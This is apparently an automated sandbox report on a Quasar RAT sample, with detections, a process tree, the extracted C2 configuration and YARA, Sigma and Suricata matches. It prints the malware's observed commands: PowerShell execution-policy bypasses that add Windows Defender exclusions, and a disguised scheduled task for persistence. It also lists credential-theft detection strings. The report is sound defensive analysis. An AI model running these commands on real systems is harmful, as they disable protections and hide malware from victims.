Edit tour

Windows Analysis Report
SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe
Analysis ID:	1611954
MD5:	08470c644b61ed4b473020eb6c455908
SHA1:	737ac06d28a5c7760a1407b9b0cb7113030ce4b7
SHA256:	be0d150d8ba2b3d607c23fac6aff6caf97525565f392e9daf3dd1baaabfcf447
Tags:	exeuser-SecuriteInfoCom
Infos:

Detection

Quasar

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Quasar RAT

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Installs a global keyboard hook

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect virtual machines (STR)

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe (PID: 7316 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe" MD5: 08470C644B61ED4B473020EB6C455908)

conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7372 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 7428 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 7448 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 7464 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 7480 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 7496 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 7512 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 7536 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 7552 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 7568 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 7584 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 7600 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 7616 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 7644 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 7692 cmdline: C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 7708 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'" MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 8000 cmdline: C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 8016 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'" MD5: 04029E121A0CFA5991749937DD22A1D9)

mmytljldrgl.exe (PID: 3156 cmdline: "C:\WCTVN\mmytljldrgl.exe" MD5: 766E053D13E4F6750E8F694EFB00FAD0)

schtasks.exe (PID: 4228 cmdline: "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 4464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Client.exe (PID: 7328 cmdline: "C:\Users\user\AppData\Roaming\SubDir\Client.exe" MD5: 766E053D13E4F6750E8F694EFB00FAD0)

schtasks.exe (PID: 7440 cmdline: "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Client.exe (PID: 7424 cmdline: C:\Users\user\AppData\Roaming\SubDir\Client.exe MD5: 766E053D13E4F6750E8F694EFB00FAD0)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Quasar RAT, QuasarRAT	Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.	APT33 Dropping Elephant Stone Panda The Gorgon Group	http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848 https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf https://asec.ahnlab.com/en/31089/	https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat

Malware Configuration

Threatname: Quasar

{"Version": "1.4.1", "Host:Port": "87.228.57.81:4782;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "cf3988ab-2fd9-4544-a16f-9faa71eb5bac", "StartupKey": "svchoost.exe", "Tag": "githubyt", "LogDirectoryName": "Logs", "ServerSignature": "SSSXaR44GRb6RYmfFpZjNvvxDEF0KI5jH8nAxi6KcQzCkmdFj4EmiNa7wzIn6QlTh6m9p8r0dvOdGcKp9R7a0feJ+9nftufivecVEcRMW+w9A0X3vAKDbhMDGoJK/oCpkIWanwn5htUKhAJB1lNPjwjIbjG59Xr7nQuXbI0zG8R5zUBqkB7LcDn23y9ViJS55kXsDdCMrrrzn3PsDzs0HTUE4E9W1OuqLpiq9ipYZce25NDQPlIfeAVgyRYzjvec4Uu1mthPaSYUvBiWdDBx5a+gN5tH6ZXROlVMsEMnIJhg/hN/HZVnynGXWaXLgqXtOtfSU5CWH4htKhRkXVbV4yhbXcIXhxL3G2FtXHDDWQjdiYyXKkTx8/z5tnTaobjzjutR8DMWLMg0D/zOKCP0VwSU5Vqn1N5RGbaOinPoUyKL1/3G9eTNYXnl00LzeENlA+hxJ6TyB9hsv85lArDm3jZ5ixI+Bl9M4ajNwTXVY8p+s41nOYrSammq6OgAThh4nd2GWivTLvpgYzJ7NWJM2yWObOFCJlLqdFVlOme65jzZyWtRSYx57sdgOVsNs5/OOJz6jSBSzEq3N0TN/hzpwQ6Tvxj0Xvvwn9DNmHiWLLE13tGYBkJfg+WVKW3m6MINZOm8VZ019XPs+RldMn2Kbu5SMX3WNIN7zvPGpR2mcRw=", "ServerCertificate": "MIIE9jCCAt6gAwIBAgIQAMCIrkV3lAMp6Vz+9SYptTANBgkqhkiG9w0BAQ0FADAcMRowGAYDVQQDDBFQaGFudG9tIFNlcnZlciBDQTAgFw0yNTAxMjQxNzU0MjFaGA85OTk5MTIzMTIzNTk1OVowHDEaMBgGA1UEAwwRUGhhbnRvbSBTZXJ2ZXIgQ0EwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCLqDcacB918PiS52/zK8NuYRFBjeeZXbEfkolana8gflQhGUIyaXW73olgd952Z18rz4CBCX2jb1f+vqHqWwbwIiVt+Ek8urXFgrOXR2CMqV/HE3QRvviIPkrLKGUsAOue2cN0CRvgEnhMpw80CsO2ZJLCoD3NHsLp+1kY7HQalZeCDuyF9F/1zoRogBQ+yYyNDshY/FTdxRak/6a2WjSD0FJpHkMNKTvCYxi2AIILH57Cyz5dr6pD/s4T+2TiiBK2SlOqm2IQ7zkcfI5rRyie1Q4UwUK1Q7+AXni7Al7XYNH5n5sHGylOW55Sf1uX8rhD7dt/rVxv4IroQeXh0ULwnZkTzHxpjLUclv7FjqSSBegcF98uGdqJzZQDHzwUPEMqJvQ4ikZBKRZtDhReWYAZoobYHxrhAv471L6Ik7hWs8VE+DFifQu2WuV11N37JQR29uwCNMyRBGEmM02YHy36zxs8cjolbQO1HaNfAKfevaezg8czVT7XAgI72i27By9HfruniOU2xjpa1ZlHKGEi7GrYSplhZcflqbYrYdEy15VQ382yt3zkJo7DYkvGIhL2D4tt176o2yF7bm/EaLn8ID5qexn2oubC5o8HCe+KtnkfS4ARLmdpJg4U6pcZUbEbd7enqJ6LAUTJ7Gi3+NFXtPRm0lT5PRYemLHIcNaNjQIDAQABozIwMDAdBgNVHQ4EFgQUkztLutpnSBqQonmJDkIlJzumy2AwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAPw0vebSaYmKRfSaRE1e2YgOVyx+WZgXuPUUY7YjGpwYNRkjgtPNgsMtZDS3jXhhXBsyKsKGDcnS51Gz5c9wV4YxjoZRzXnIom0Ia1WXfifdugNvIRkKgNS3kn0SfHUjgjktUtZxAfUqiGJn2QipIDB5b+tEBG5J9PYWmNC+3205Z5cl9Ti9KgXN3FKf+/slRaE3ACPJlTdRIg3S5u7uFIKtEUkSE1WuhQi6Lyms2a0rILI3e53o+YmpSys1YOafIDUP8UboM9ktsJY4V3zcFheChn15IE+a8LJYcRAIsJbjPCw2Jo/z6R3+XY/U7nFyS5tU9oIjtDpndOOErtnVgiMeGNPmkEY3SvkEYjS8TXovcSJa00nj+yHapZxrzn9MYFYyP1lIlmhnnU+RnY5jhQVlnhccExAAb7BKXnuVI2EraVaz9wxHEUnD/3kzJj7gSvd1Ja/cqzjUb56fU4volehkDVt+XD+udV3KndKDCCwx0JEo4d/u+PHA9Q14Lw13dNWGL4zS7vqOzHYPGkeONKbq3RusCL6rzq7VcCQtg7CrB/cfuBx3cWGbM58uuLIQwoYmHrWqZo9UA7FNsodRUz+bwVokS90KzHSORD1bTc7VfotLt0P95UTm58zfgHd7CCqbjCNdaVU6JisRdkRwKr/r79j9z306SIvr1Qs6bRZw="}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28ef4b:$x1: Quasar.Common.Messages 0x29f274:$x1: Quasar.Common.Messages 0x2ab832:$x4: Uninstalling... good bye :-( 0x2ad027:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2aade4:$f1: FileZilla\recentservers.xml 0x2aae24:$f2: FileZilla\sitemanager.xml 0x2aae66:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2ab0b2:$b1: Chrome\User Data\ 0x2ab108:$b1: Chrome\User Data\ 0x2ab3e0:$b2: Mozilla\Firefox\Profiles 0x2ab4dc:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fd438:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2ab634:$b4: Opera Software\Opera Stable\Login Data 0x2ab6ee:$b5: YandexBrowser\User Data\ 0x2ab75c:$b5: YandexBrowser\User Data\ 0x2ab430:$s4: logins.json 0x2ab166:$a1: username_value 0x2ab184:$a2: password_value 0x2ab470:$a3: encryptedUsername 0x2fd37c:$a3: encryptedUsername 0x2ab494:$a4: encryptedPassword 0x2fd39a:$a4: encryptedPassword 0x2fd318:$a5: httpRealm
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x164f16:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2ab91c:$s3: Process already elevated. 0x28ec4a:$s4: get_PotentiallyVulnerablePasswords 0x278ccc:$s5: GetKeyloggerLogsDirectory 0x29e9d3:$s5: GetKeyloggerLogsDirectory 0x28ec6d:$s6: set_PotentiallyVulnerablePasswords 0x2fea66:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
C:\Users\user\AppData\Roaming\SubDir\Client.exe	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
C:\Users\user\AppData\Roaming\SubDir\Client.exe	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28ef4b:$x1: Quasar.Common.Messages 0x29f274:$x1: Quasar.Common.Messages 0x2ab832:$x4: Uninstalling... good bye :-( 0x2ad027:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
C:\Users\user\AppData\Roaming\SubDir\Client.exe	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2aade4:$f1: FileZilla\recentservers.xml 0x2aae24:$f2: FileZilla\sitemanager.xml 0x2aae66:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2ab0b2:$b1: Chrome\User Data\ 0x2ab108:$b1: Chrome\User Data\ 0x2ab3e0:$b2: Mozilla\Firefox\Profiles 0x2ab4dc:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fd438:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2ab634:$b4: Opera Software\Opera Stable\Login Data 0x2ab6ee:$b5: YandexBrowser\User Data\ 0x2ab75c:$b5: YandexBrowser\User Data\ 0x2ab430:$s4: logins.json 0x2ab166:$a1: username_value 0x2ab184:$a2: password_value 0x2ab470:$a3: encryptedUsername 0x2fd37c:$a3: encryptedUsername 0x2ab494:$a4: encryptedPassword 0x2fd39a:$a4: encryptedPassword 0x2fd318:$a5: httpRealm
C:\Users\user\AppData\Roaming\SubDir\Client.exe	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x164f16:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2ab91c:$s3: Process already elevated. 0x28ec4a:$s4: get_PotentiallyVulnerablePasswords 0x278ccc:$s5: GetKeyloggerLogsDirectory 0x29e9d3:$s5: GetKeyloggerLogsDirectory 0x28ec6d:$s6: set_PotentiallyVulnerablePasswords 0x2fea66:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
C:\WCTVN\mmytljldrgl.exe	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
C:\WCTVN\mmytljldrgl.exe	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28ef4b:$x1: Quasar.Common.Messages 0x29f274:$x1: Quasar.Common.Messages 0x2ab832:$x4: Uninstalling... good bye :-( 0x2ad027:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
C:\WCTVN\mmytljldrgl.exe	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2aade4:$f1: FileZilla\recentservers.xml 0x2aae24:$f2: FileZilla\sitemanager.xml 0x2aae66:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2ab0b2:$b1: Chrome\User Data\ 0x2ab108:$b1: Chrome\User Data\ 0x2ab3e0:$b2: Mozilla\Firefox\Profiles 0x2ab4dc:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fd438:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2ab634:$b4: Opera Software\Opera Stable\Login Data 0x2ab6ee:$b5: YandexBrowser\User Data\ 0x2ab75c:$b5: YandexBrowser\User Data\ 0x2ab430:$s4: logins.json 0x2ab166:$a1: username_value 0x2ab184:$a2: password_value 0x2ab470:$a3: encryptedUsername 0x2fd37c:$a3: encryptedUsername 0x2ab494:$a4: encryptedPassword 0x2fd39a:$a4: encryptedPassword 0x2fd318:$a5: httpRealm
C:\WCTVN\mmytljldrgl.exe	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x164f16:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2ab91c:$s3: Process already elevated. 0x28ec4a:$s4: get_PotentiallyVulnerablePasswords 0x278ccc:$s5: GetKeyloggerLogsDirectory 0x29e9d3:$s5: GetKeyloggerLogsDirectory 0x28ec6d:$s6: set_PotentiallyVulnerablePasswords 0x2fea66:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
Click to see the 7 entries

Memory Dumps

Source	Rule	Description	Author
0000001B.00000002.2946566856.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000018.00000000.2059375290.0000000000770000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000018.00000000.2051054943.0000000000452000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: mmytljldrgl.exe PID: 3156	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: Client.exe PID: 7328	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
24.0.mmytljldrgl.exe.450000.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
24.0.mmytljldrgl.exe.450000.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28ef4b:$x1: Quasar.Common.Messages 0x29f274:$x1: Quasar.Common.Messages 0x2ab832:$x4: Uninstalling... good bye :-( 0x2ad027:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
24.0.mmytljldrgl.exe.450000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2aade4:$f1: FileZilla\recentservers.xml 0x2aae24:$f2: FileZilla\sitemanager.xml 0x2aae66:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2ab0b2:$b1: Chrome\User Data\ 0x2ab108:$b1: Chrome\User Data\ 0x2ab3e0:$b2: Mozilla\Firefox\Profiles 0x2ab4dc:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fd438:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2ab634:$b4: Opera Software\Opera Stable\Login Data 0x2ab6ee:$b5: YandexBrowser\User Data\ 0x2ab75c:$b5: YandexBrowser\User Data\ 0x2ab430:$s4: logins.json 0x2ab166:$a1: username_value 0x2ab184:$a2: password_value 0x2ab470:$a3: encryptedUsername 0x2fd37c:$a3: encryptedUsername 0x2ab494:$a4: encryptedPassword 0x2fd39a:$a4: encryptedPassword 0x2fd318:$a5: httpRealm
24.0.mmytljldrgl.exe.450000.0.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x164f16:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2ab91c:$s3: Process already elevated. 0x28ec4a:$s4: get_PotentiallyVulnerablePasswords 0x278ccc:$s5: GetKeyloggerLogsDirectory 0x29e9d3:$s5: GetKeyloggerLogsDirectory 0x28ec6d:$s6: set_PotentiallyVulnerablePasswords 0x2fea66:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'", CommandLine: C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, ParentProcessId: 7316, ParentProcessName: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'", ProcessId: 7692, ProcessName: cmd.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'", CommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7692, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'", ProcessId: 7708, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f, CommandLine: "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\SubDir\Client.exe", ParentImage: C:\Users\user\AppData\Roaming\SubDir\Client.exe, ParentProcessId: 7328, ParentProcessName: Client.exe, ProcessCommandLine: "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f, ProcessId: 7440, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f, CommandLine: "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\WCTVN\mmytljldrgl.exe" , ParentImage: C:\WCTVN\mmytljldrgl.exe, ParentProcessId: 3156, ParentProcessName: mmytljldrgl.exe, ProcessCommandLine: "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f, ProcessId: 4228, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'", CommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7692, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'", ProcessId: 7708, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-11T11:04:22.162706+0100	2035595	1	Domain Observed Used for C2 Detected	87.228.57.81	4782	192.168.2.4	49739	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\WCTVN\mmytljldrgl.exe	Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1307453

Found malware configuration

Source: 24.0.mmytljldrgl.exe.450000.0.unpack

